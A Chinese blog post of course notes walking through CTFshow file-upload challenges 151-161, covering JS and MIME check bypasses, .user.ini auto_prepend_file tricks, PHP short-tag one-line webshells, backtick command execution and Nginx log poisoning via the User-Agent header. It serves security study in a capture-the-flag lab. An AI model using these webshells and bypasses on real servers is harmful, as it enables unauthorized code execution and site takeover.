小迪安全-Web攻防-文件上传-JS验证&mime&user.ini&语言特性

于 2024-08-04 16:23:00 发布
阅读量583 收藏 10
点赞数 10
文章标签: 前端 安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43809272/article/details/140907421
版权

一、知识点

1、文件上传-前端验证

2、文件上传-黑白名单

3、文件上传-user.ini妙用

4、文件上传-PHP语言特性

二、详细点

1、检测层面:前端,后端

前置:后门代码需要用特定格式后缀解析,不能以图片后缀解析解析脚本后门代码(解析漏洞除外)

如:JPG图片里面有PHP后门代码,不能被触发,所以连接不上后门

2、检测内容:文件头,完整性,二次渲染等

3、检测后缀:黑名单,白名单,MIMEE检测等

4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

三、演示案例

1、CTFshow-151

前端过滤–直接修改前端允许上传的类型绕过

利用插件hackbar,或者webshell工具(哥斯拉,蚁剑等)

2、CTFshow-152

前后端同时过滤:JS验证+MIME

1)修改前端代码允许php文件上传

2)BP抓包修改content-type为image/png绕过

3、CTFshow-153

前后端过滤同时严格过滤参数:JS验证+.user.ini

1)上传.user.ini配置文件:auto_prepend_file=1.png

2)上传写有webshell的文件(可以为txt也可以为png)

1.png:"PHP一句话木马"

3)访问index.php即可反弹shell

补充知识:.user.ini

除了PHP_INI_SYSTEM以外的模式都是可以通过.user.ini来设置的。在修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。

.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、 PHP_INI_USER”的设置。

其中有两个配置,可以用来制造后门:

auto_append_file; 指定一个文件,自动包含在要执行的文件前。

auto_prepend_file; 指定一个文件,自动包含在要执行的文件后。

使用方法很简单,直接写在.user.ini中:

auto_prepend_file=1.png

或者

auto_append_file=1.png

4、CTFshow-154,155

JS验证+.user.ini+短标签

1)上传.user.ini文件:auto_prepend_file = 1.png

2)上传木马文件1.png:"PHP一句话木马" (No)

3)删减进行过滤内容确定,最终确定为过滤掉了

选择PHP代码执行的等价格式: <?=eval($_POST[x]);?>(YES)

4)访问index.php,即可反弹shell。

# 等价为PHP代码 <?php phpinfo();?> 的代码执行格式
# PHP短标签

<? echo '123';?>    #前提是开启配置参数short_open_tags=on 
<?=(表达式) ?>       #不需要开启参数设置        
<% echo '123';%>    #前提是开启配置参数asp_tapgs=on
<script language="php">echo '1'; </script>   #不需要修改参数开关

5、CTFshow-156

JS验证+user.ini+短标签+过滤

比对分析可知,过滤了[]

1)上传.user.ini文件:auto_prepend_file = 1.png

2)上传木马文件1.png: <?=eval($_POST[x]);?>(No)

3)1.png:<?=eval($_POST{0});?> (YES)

4)访问index.php,即可反弹shell。

5、CTFshow-157-159

JS验证+user.ini+短标签+过滤

157-158关:过滤了;

159关:过滤了()

1)上传.user.ini文件:auto_prepend_file = 1.png

2)上传木马文件1.png: <?=eval($_POST{x});?>(No)

3)157-158 ==> 1.png:<?=system('tac ../fl*')?> (YES)

159 ==> 1.png: <?=`tac ../fl*`?>(YES)

反引号运算符的效果与函数shell_exec(相同)

6、CTFshow-160

JS验证+user.ini+短标签+过滤

BP抓包发现使用的Nginx中间件,Nginx的日志路径为:/var/log/nginx

采用包含默认日志的方式进行绕过处理,日志中记录UA头信息,在UA头信息中写入后门代码,hackbar或者远程工具连接获取flag。

1)上传.user.ini文件:auto_prepend_file = 1.png

2)上传木马文件1.png: <?=`tac ../fl*`?>(No)

3)1.png:<?=include"/var/lo"."g/nginx/access.lo"."g"?> (YES)

4)BP抓包,在UA头信息中写入后门代码,利用工具获取flag

7、CTFshow-161

JS验证+user.ini+短标签+过滤

文件头部检测是否为图片格式文件

user ini:GIF89A auto_prepend_file=test.png

test.png:GIF89A <?=include"/var/lo"."g/nginx/access.lo"."g"?> (YES)

weixin_43809272
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于mime-util-2.1.3.jar自动识别文件类型
11-19
基于mime-util-2.1.3.jar自动识别文件类型
apache-mime4j-0.6.jar&httpmime-4.0.1.jar
04-27
Apache MIME4J与HTTPMIME是两个在Android开发中用于文件上传至服务器的重要库,尤其在处理MIME类型数据时非常关键。这两个Java库分别提供了不同的功能,让我们逐一深入探讨。 首先,Apache MIME4J(apache-mime4j-...
小迪安全31WEB 攻防-通用漏洞&文件上传&js 验证&mime&user.ini&语言特性
weixin_73760178的博客
03-04 992
是指定一个文件可以在index.php里执行,所以它不是像前置中所提到的一样,况且它也是解析代码,它是在index.php中调用了.user.ini从而触发后门;日志文件:记录访问的地址和访问的信息和访问的UA头,我们将UA头改为payload,UA头流入日志文件中,再利用/user.ini去包含日志文件,去触发UA头中的payload。做了.user.ini文件配置之后,访问upload的情况——包含了日志文件,故显示出日志文件的内容。、绕过技巧:多后缀解析(PHP5),截断,中间件特性,条件竞争等。
day31WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性
m0_69583059的博客
01-24 1204
知识点:1、文件上传-前端验证2、文件上传-黑白名单3、文件上传-user.in妙用4、文件上传-PHP语言特性后门代码需要特定后缀格式解析,不能以图片后缀解析脚本后门代码(解析漏洞除外),如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门。
WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性
m0_65336233的博客
10-11 599
WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性
31、WEB攻防——通用漏洞&文件上传&JS验证&mime&user.ini&语言特性
qq_55202378的博客
01-22 655
直接改html代码。
第31天:WEB攻防-通用漏洞&文件上传&js验证&mime&user.ini&语言特性
wuqingsix的博客
11-22 664
上传文件时,未对上传的文件进行严格的验证和过滤,造成用户可以上传可执行脚本的漏洞叫文件上传漏洞。3、增添或修改action,修改为上传的源文件。可以通过文件上传漏洞上传网站后门,获取网站权限。前端验证浏览器可直接禁用或删除,后端是安全的。本节主要依靠靶场测试环境理解:具体可参考。1、将前端下载到本地。
小迪安全31WEB 攻防-通用漏洞&amp;文件上传&amp;js 验证&amp;mime&amp;user
m0_63174618的博客
04-09 325
日志文件:记录访问的地址和访问的信息和访问的UA头,我们将UA头改为payload,UA头流入日志文件中,再利用/user.ini去包含日志文件,去触发UA头中的payload。做了.user.ini文件配置之后,访问upload的情况——包含了日志文件,故显示出日志文件的内容。与上两题结合即可,利用.user.ini,去触发1.png,1.png中还需内容过滤。161 JS 验证+user.ini+短标签+过滤+文件头。
小迪安全31WEB 攻防-通用漏洞&amp;文件上传&amp;js 验证&amp;mime&amp;user(1)
m0_62261166的博客
04-16 432
文件,并在其中定义特定的 PHP 配置选项,用户可以对其网站或应用程序的 PHP 环境进行个性化设置auto_prepend_file=test.png 相当将一个文件包含,这里我们就可以放payload进去,将图片马传上去,再访问index.php,注意是上传目录下的index.php,执行任意命令即可。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。echo '123';
小迪安全31WEB 攻防-通用漏洞&amp;文件上传&amp;js 验证&amp;mime&amp;user(2)
m0_62289824的博客
04-16 405
文件,并在其中定义特定的 PHP 配置选项,用户可以对其网站或应用程序的 PHP 环境进行个性化设置auto_prepend_file=test.png 相当将一个文件包含,这里我们就可以放payload进去,将图片马传上去,再访问index.php,注意是上传目录下的index.php,执行任意命令即可。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
小迪安全33WEB 攻防-通用漏洞&文件上传&中间件解析漏洞&编辑器安全
weixin_73760178的博客
03-07 1174
那么当我们写入1.php.jpg时,表面上的图片,但由于管理员的配置,所以会将此文件解析为php。上传带有后门的图片,再后面输入/*.php(*指任意),即可被执行。此时发现,原本的图片被解析为.asp格式,因此也可以从此进行利用。因此我们可以利用文件上传,上传此文件类型,访问图片,生成后门。、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等。1.上传文件能不能修改上传目录或上传的文件名能增加命名。上传文件,在后面Hex里修改相关参数,进行绕过过滤。此时的图片是可以正常运行的,是一个正常的图片形式。
第二节 文件上传-绕过MIME-Type验证-01
09-15
因此,Web应用需要对上传文件的MIME-Type进行验证,以确保上传的文件类型安全。 在 PHP 中,可以使用 $_FILE['upload_file']['type'] 获取上传文件的MIME-Type类型。上传文件的MIME-Type类型可以在表单中定义,例如...
mime-types:最终的javascript content-type实用程序
02-04
最终的javascript内容类型实用程序。 与类似,除了: 没有后备。 而不是天真地返回第一个可用类型, mime-types只返回false ,所以var type = mime.lookup('unrecognized') || 'application/octet-stream' var ...
httpmime-4.25.jar.zip
04-14
以下是一个简单的使用httpmime-4.25.jar发送POST请求并上传文件的Java代码示例: ```java CloseableHttpClient httpClient = HttpClients.createDefault(); HttpPost httpPost = new HttpPost(...
前端Web-JavaScript(上)
Yu2uki的博客
07-31 1448
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。
WEB渗透Web突破篇-SSRF
最新发布
qq_59468567的博客
08-03 470
转码服务 在线翻译 获取超链接的标题等内容进行显示 请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片) 图片、文章收藏功能 对外发起网络请求的地方,网站采集、网页抓取的地方。 头像 (远程加载头像) 一切要你输入网址的地方和可以输入ip的地方。 数据库内置功能(mongodb的copyDatabase函数) 邮件系统 文件处理 在线处理工具 从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、im
探索WebKit之巅:开启现代网页应用的高效与兼容之旅
weixin_67239318的博客
08-03 211
随着现代网页应用的快速发展,WebKit作为先进的浏览器引擎,其在高效性和兼容性上的表现显得尤为重要。本文深入探讨了WebKit的架构和渲染机制,揭示了其在支持Web标准和提升浏览体验方面的关键技术。通过分析WebKit如何处理DOM操作、JavaScript执行与图形渲染等挑战,我们了解到优化WebKit性能不仅关乎算法和硬件的优化,还涉及网络协议和安全框架的理解。此外,本文讨论如何通过WebKit应对多设备和分辨率下的兼容性问题。掌握这些关键因素,对于开发者来说,是打造高效、兼容的现代网页应用的基础。
高德地图离线版 使用高德地图api的方法
m0_62336925的博客
08-02 387
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值